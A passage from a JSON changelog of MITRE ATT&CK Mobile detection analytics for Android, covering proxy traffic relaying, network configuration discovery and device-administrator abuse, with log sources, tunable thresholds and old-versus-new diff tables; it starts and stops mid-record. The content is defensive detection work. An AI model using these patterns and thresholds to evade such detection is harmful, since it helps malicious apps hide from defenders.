class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">for&nbsp;device&nbsp;administrator&nbsp;permissions.&nbsp;The&nbsp;user&nbsp;can&nbsp;see&nbsp;which</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ord&nbsp;reset,&nbsp;device&nbsp;lock,&nbsp;policy&nbsp;enforcement,&nbsp;prevention&nbsp;of&nbsp;un</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;applications&nbsp;are&nbsp;registered&nbsp;as&nbsp;device&nbsp;administrators&nbsp;in&nbsp;the</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">install).&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;an&nbsp;appl</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;device&nbsp;settings.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ication&nbsp;transitions&nbsp;into&nbsp;a&nbsp;privileged&nbsp;device&nbsp;control&nbsp;role&nbsp;an</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;rapidly&nbsp;exercises&nbsp;those&nbsp;capabilities&nbsp;outside&nbsp;expected&nbsp;user</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">-driven&nbsp;patterns.&nbsp;&nbsp;Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;check&nbsp;fo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;the&nbsp;string&nbsp;`BIND_DEVICE_ADMIN`&nbsp;in&nbsp;the&nbsp;application\u2019s&nbsp;manife</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">st.&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--cb78ff0f-6f8a-41a8-a199-4660a0addec9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 17:33:41.747000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0631#AN1702",
                            "external_id": "AN1702"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1702",
                    "description": "The defender correlates proxy-capable network setup or socket-handling behavior with subsequent bidirectional traffic relaying through the same device and app context, especially when inbound client sessions are followed by outbound connections to unrelated remote destinations or when the device sustains multiplexed traffic patterns inconsistent with normal mobile app workflows. The analytic prioritizes Android-observable effects: proxy or raw-socket setup, app background execution, inbound-to-outbound traffic bridging, and sustained relayed flows to multiple destinations without recent user interaction.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Managed app without approved VPN, enterprise tunneling, browser, or remote-access role exhibits proxy-like traffic handling inconsistent with policy baseline"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "NSM:Flow",
                            "channel": "App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between proxy/socket setup and subsequent inbound-outbound traffic bridging"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to proxy or tunnel traffic, such as enterprise VPN, remote access, security testing, or managed browser apps"
                        },
                        {
                            "field": "AllowedDestinationList",
                            "description": "Approved remote destinations or service categories for legitimate tunneling applications"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether proxy-capable or relayed traffic should occur only during active user-driven workflows"
                        },
                        {
                            "field": "RelaySessionThreshold",
                            "description": "Minimum number of correlated inbound and outbound session pairs required to indicate relay behavior"
                        },
                        {
                            "field": "ByteSymmetryTolerance",
                            "description": "Allowed variance between inbound and outbound byte volumes when identifying proxied traffic"
                        },
                        {
                            "field": "ConcurrentDestinationThreshold",
                            "description": "Maximum expected number of simultaneous unrelated remote destinations for a legitimate app"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume required for relay behavior to be considered meaningful"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between proxy/socket setup and subsequent inbound-outbound traffic bridging\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to proxy or tunnel traffic, such as enterprise VPN, remote access, security testing, or managed browser apps\"}, {\"field\": \"AllowedDestinationList\", \"description\": \"Approved remote destinations or service categories for legitimate tunneling applications\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether proxy-capable or relayed traffic should occur only during active user-driven workflows\"}, {\"field\": \"RelaySessionThreshold\", \"description\": \"Minimum number of correlated inbound and outbound session pairs required to indicate relay behavior\"}, {\"field\": \"ByteSymmetryTolerance\", \"description\": \"Allowed variance between inbound and outbound byte volumes when identifying proxied traffic\"}, {\"field\": \"ConcurrentDestinationThreshold\", \"description\": \"Maximum expected number of simultaneous unrelated remote destinations for a legitimate app\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume required for relay behavior to be considered meaningful\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 17:33:41.747000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates proxy-capable network setup or socket-handling behavior with subsequent bidirectional traffic relaying through the same device and app context, especially when inbound client sessions are followed by outbound connections to unrelated remote destinations or when the device sustains multiplexed traffic patterns inconsistent with normal mobile app workflows. The analytic prioritizes Android-observable effects: proxy or raw-socket setup, app background execution, inbound-to-outbound traffic bridging, and sustained relayed flows to multiple destinations without recent user interaction.\", \"old_value\": \"Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Managed app without approved VPN, enterprise tunneling, browser, or remote-access role exhibits proxy-like traffic handling inconsistent with policy baseline\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a\", \"name\": \"NSM:Flow\", \"channel\": \"App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to118__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to118__0\"><a href=\"#difflib_chg_to118__top\">t</a></td><td class=\"diff_header\" id=\"from118_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Enterprises&nbsp;may&nbsp;be&nbsp;able&nbsp;to&nbsp;detect&nbsp;anomalous&nbsp;traffic&nbsp;originat</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to118__top\">t</a></td><td class=\"diff_header\" id=\"to118_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;proxy-capable&nbsp;network&nbsp;setup&nbsp;or&nbsp;socke</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ing&nbsp;from&nbsp;mobile&nbsp;devices,&nbsp;which&nbsp;could&nbsp;indicate&nbsp;compromise.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">t-handling&nbsp;behavior&nbsp;with&nbsp;subsequent&nbsp;bidirectional&nbsp;traffic&nbsp;re</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">laying&nbsp;through&nbsp;the&nbsp;same&nbsp;device&nbsp;and&nbsp;app&nbsp;context,&nbsp;especially&nbsp;w</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">hen&nbsp;inbound&nbsp;client&nbsp;sessions&nbsp;are&nbsp;followed&nbsp;by&nbsp;outbound&nbsp;connect</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ions&nbsp;to&nbsp;unrelated&nbsp;remote&nbsp;destinations&nbsp;or&nbsp;when&nbsp;the&nbsp;device&nbsp;sus</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tains&nbsp;multiplexed&nbsp;traffic&nbsp;patterns&nbsp;inconsistent&nbsp;with&nbsp;normal&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">mobile&nbsp;app&nbsp;workflows.&nbsp;The&nbsp;analytic&nbsp;prioritizes&nbsp;Android-obser</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">vable&nbsp;effects:&nbsp;proxy&nbsp;or&nbsp;raw-socket&nbsp;setup,&nbsp;app&nbsp;background&nbsp;exe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cution,&nbsp;inbound-to-outbound&nbsp;traffic&nbsp;bridging,&nbsp;and&nbsp;sustained&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">relayed&nbsp;flows&nbsp;to&nbsp;multiple&nbsp;destinations&nbsp;without&nbsp;recent&nbsp;user&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nteraction.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f44bab9b-554c-4dc7-b57f-4011ce609c2b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-18 19:59:27.650000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0634#AN1706",
                            "external_id": "AN1706"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1706",
                    "description": "Defender observes an app (package/UID) repeatedly retrieving network interface configuration attributes (local IP/MAC/interface names, active network capabilities, link properties, proxy/DNS settings, or carrier identifiers when permitted) in a short time window, without corresponding user network-management activity. The pattern is characterized by OS API execution for interface/config reads combined with background state, permission/role context (e.g., device owner/profile owner/carrier/default-SMS), and optional follow-on connectivity tests (gateway/DNS/proxy reachability). Correlate across API execution + app state + (optional) local probe to identify automated network configuration discovery rather than routine connectivity checks.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "Application Vetting",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Window to correlate config reads with app state and optional connectivity tests (e.g., 30\u2013300s)."
                        },
                        {
                            "field": "MinConfigReadEvents",
                            "description": "Minimum number of network-config read signals before flagging (environment dependent; e.g., \u226510/5m)."
                        },
                        {
                            "field": "BackgroundOnly",
                            "description": "If true, require the app to be backgrounded to reduce legitimate network UI/diagnostic activity."
                        },
                        {
                            "field": "AllowlistedPackages",
                            "description": "Connectivity/security/MDM apps expected to query network configuration frequently."
                        },
                        {
                            "field": "PrivilegedRoleFilter",
                            "description": "If true, elevate severity when an app with device-owner/profile-owner/carrier roles performs bursts."
                        },
                        {
                            "field": "LocalProbePorts",
                            "description": "Ports considered 'connectivity tests' (e.g., 53, 80, 443, 8080, 3128) \u2013 tune per environment."
                        },
                        {
                            "field": "NetworkChangeSuppressionSeconds",
                            "description": "Suppress alerts shortly after legitimate network transitions (Wi-Fi join, VPN connect) to reduce noise."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Window to correlate config reads with app state and optional connectivity tests (e.g., 30\\u2013300s).\"}, {\"field\": \"MinConfigReadEvents\", \"description\": \"Minimum number of network-config read signals before flagging (environment dependent; e.g., \\u226510/5m).\"}, {\"field\": \"BackgroundOnly\", \"description\": \"If true, require the app to be backgrounded to reduce legitimate network UI/diagnostic activity.\"}, {\"field\": \"AllowlistedPackages\", \"description\": \"Connectivity/security/MDM apps expected to query network configuration frequently.\"}, {\"field\": \"PrivilegedRoleFilter\", \"description\": \"If true, elevate severity when an app with device-owner/profile-owner/carrier roles performs bursts.\"}, {\"field\": \"LocalProbePorts\", \"description\": \"Ports considered 'connectivity tests' (e.g., 53, 80, 443, 8080, 3128) \\u2013 tune per environment.\"}, {\"field\": \"NetworkChangeSuppressionSeconds\", \"description\": \"Suppress alerts shortly after legitimate network transitions (Wi-Fi join, VPN connect) to reduce noise.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-18 19:59:27.650000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an app (package/UID) repeatedly retrieving network interface configuration attributes (local IP/MAC/interface names, active network capabilities, link properties, proxy/DNS settings, or carrier identifiers when permitted) in a short time window, without corresponding user network-management activity. The pattern is characterized by OS API execution for interface/config reads combined with background state, permission/role context (e.g., device owner/profile owner/carrier/default-SMS), and optional follow-on connectivity tests (gateway/DNS/proxy reachability). Correlate across API execution + app state + (optional) local probe to identify automated network configuration discovery rather than routine connectivity checks.\", \"old_value\": \"Application vetting services could look for usage of the `READ_PRIVILEGED_PHONE_STATE` Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to115__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to115__0\"><a href=\"#difflib_chg_to115__top\">t</a></td><td class=\"diff_header\" id=\"from115_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;usage&nbsp;of&nbsp;the&nbsp;`RE</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to115__top\">t</a></td><td class=\"diff_header\" id=\"to115_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;app&nbsp;(package/UID)&nbsp;repeatedly&nbsp;retrieving</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">AD_PRIVILEGED_PHONE_STATE`&nbsp;Android&nbsp;permission.&nbsp;This&nbsp;could&nbsp;in</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;network&nbsp;interface&nbsp;configuration&nbsp;attributes&nbsp;(local&nbsp;IP/MAC/in</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">dicate&nbsp;that&nbsp;non-system&nbsp;apps&nbsp;are&nbsp;attempting&nbsp;to&nbsp;access&nbsp;informa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">terface&nbsp;names,&nbsp;active&nbsp;network&nbsp;capabilities,&nbsp;link&nbsp;properties,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tion&nbsp;that&nbsp;they&nbsp;do&nbsp;not&nbsp;have&nbsp;access&nbsp;to.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;proxy/DNS&nbsp;settings,&nbsp;or&nbsp;carrier&nbsp;identifiers&nbsp;when&nbsp;permitted)&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">in&nbsp;a&nbsp;short&nbsp;time&nbsp;window,&nbsp;without&nbsp;corresponding&nbsp;user&nbsp;network-m</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">anagement&nbsp;activity.&nbsp;The&nbsp;pattern&nbsp;is&nbsp;characterized&nbsp;by&nbsp;OS&nbsp;API&nbsp;e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">xecution&nbsp;for&nbsp;interface/config&nbsp;reads&nbsp;combined&nbsp;with&nbsp;background</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;state,&nbsp;permission/role&nbsp;context&nbsp;(e.g.,&nbsp;device&nbsp;owner/profile&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">owner/carrier/default-SMS),&nbsp;and&nbsp;optional&nbsp;follow-on&nbsp;connectiv</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ity&nbsp;tests&nbsp;(gateway/DNS/proxy&nbsp;reachability).&nbsp;Correlate&nbsp;across</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;API&nbsp;execution&nbsp;+&nbsp;app&nbsp;state&nbsp;+&nbsp;(optional)&nbsp;local&nbsp;probe&nbsp;to&nbsp;ident</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ify&nbsp;automated&nbsp;network&nbsp;configuration&nbsp;discovery&nbsp;rather&nbsp;than&nbsp;ro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">utine&nbsp;connectivity&nbsp;checks.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--98dfbd23-232b-410a-bb71-25ba191ff746",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-18 19:46:01.796000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0636#AN1710",
                            "external_id": "AN1710"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1710",
                    "description": "Defender observes an app (package/UID) repeatedly querying device networking context APIs (Wi-Fi scan results/current SSID/BSSID, Bluetooth device discovery, or cellular tower lists) at a rate or timing inconsistent with the app\u2019s normal UX, often while backgrounded. Correlate API calls with permission usage (fine location, nearby devices/Bluetooth) and concurrent connectivity probes (DNS lookups/ARP/port reachability) to distinguish automated discovery from user-initiated settings checks. The detection is based on observed API execution + permission use + rate/sequence, not the specific API method name.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
                            "name": "android:appops",
                            "channel": "ACCESS_FINE_LOCATION|NEARBY_DEVICES|BLUETOOTH_SCAN used in close proximity to network-context queries"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "wifiservice startScan / scanResults retrieved repeatedly or by unexpected package"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "telephony cell info enumeration bursts (neighboring/all cell info) by package"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Correlation window to link scan/enumeration API usage with subsequent probes (e.g., 30\u2013300s)."
                        },
                        {
                            "field": "MinScanCalls",
                            "description": "Minimum number of scan/enumeration calls per window before flagging (e.g., \u22653 Wi-Fi scans / 5 min)."
                        },
                        {
                            "field": "MinUniqueTargets",
                            "description": "For Bluetooth/cell, minimum unique devices/towers observed per window (helps avoid single-device noise)."
                        },
                        {
                            "field": "BackgroundOnly",
                            "description": "Require app to be backgrounded during discovery to suppress legitimate UI-driven network selection."
                        },
                        {
                            "field": "AllowlistedPackages",
                            "description": "Packages expected to scan (system settings, Wi-Fi managers, MDM, enterprise connectivity tools)."
                        },
                        {
                            "field": "LocationPermissionRequired",
                            "description": "If true, require AppOps noteOp for fine location/nearby devices to reduce false positives."
                        },
                        {
                            "field": "LocalProbeCIDRs",
                            "description": "CIDR ranges considered 'local discovery' targets (e.g., 192.168.0.0/16, 10.0.0.0/8)."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
